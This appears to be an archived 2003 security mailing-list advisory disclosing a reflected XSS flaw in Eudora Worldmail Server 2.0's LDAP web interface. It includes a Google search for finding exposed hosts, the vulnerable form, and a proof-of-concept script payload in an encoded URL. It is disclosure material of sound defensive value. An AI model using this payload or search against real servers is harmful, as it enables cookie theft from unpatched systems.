[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE36RJ6xucduS0000844b@hotmail.com>
Date: Fri, 15 Aug 2003 15:34:58 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: Eudora Worldmail Server 2.0 -XSS Injection
------------------------------------------------------------------
- EXPL-A-2003-020 exploitlabs.com Advisory 020
------------------------------------------------------------------
-= Eudora Worldmail Server 2.0 =-
Donnie Werner
Aug 9, 2003
Product:
--------
Eudora Worldmail Server 2.0
http://www.qualcomm.com/
http://www.eudora.com/worldmail/
Vunerability(s):
----------------
1. XSS injection
Description of product:
-----------------------
http://www.eudora.com/worldmail/features.html
Banner id:
HTTP/1.0 200 Document follows
Server: ISOCOR web500gw 2.0.0.3
MIME-Version: 1.0
Date: Wednesday, 06-Aug-2003 GMT
Content-type: text/html
examples could be found by:
http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&saf
e=off&q=Qpam.htm&btnG=Google+Search
VUNERABILITY / EXPLOIT
======================
Vunerable hosts display the following:
-------------- snip ----------------------
A convenient hypertext interface to LDAP and X.500 Directories.
Local domains and aliases
Results for: entries at the top level
Name Description
Countries
AE <---------------- example country
IT
CA
--------------- snip --------------------
Select a country ( "AE" used as example )
you should see something like the following..
http://[host]:8888/c%3dAE
and a search box
"One-level search in AE:"
<FORM METHOD=GET ACTION="/c%3dAE">
<A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
<INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
<INPUT TYPE=reset VALUE="Clear"></FORM>
enter sum cool XSS...
<SCRIPT>alert(document.cookie);</SCRIPT>
and get
http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C
%2FSCRIPT%3E
the results are rendered by the output of the formatted html.
yes, it just a non persistant XSS, but this is running as a service on
port 8888 and is a mail processing server, so there may be other issues
( DoS ? ) as well.
I belive LDAP has some DCOM connectivity, and there could be issues
with the LDAP...
SLAPD or X.500 Error: Not found
An error occurred while searching the SLAPD or X.500 directory
The error code was 32:
No such object.
No additional information is available.Please report errors to the
Administrator.
Local:
------
???
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
Concurrent with this advisory
eudora-custserv@...lcomm.com
Credits:
--------
Donnie Werner
morning_wood@...labs.com
http://e2-labs.com
Original at
http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-ser
ver.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists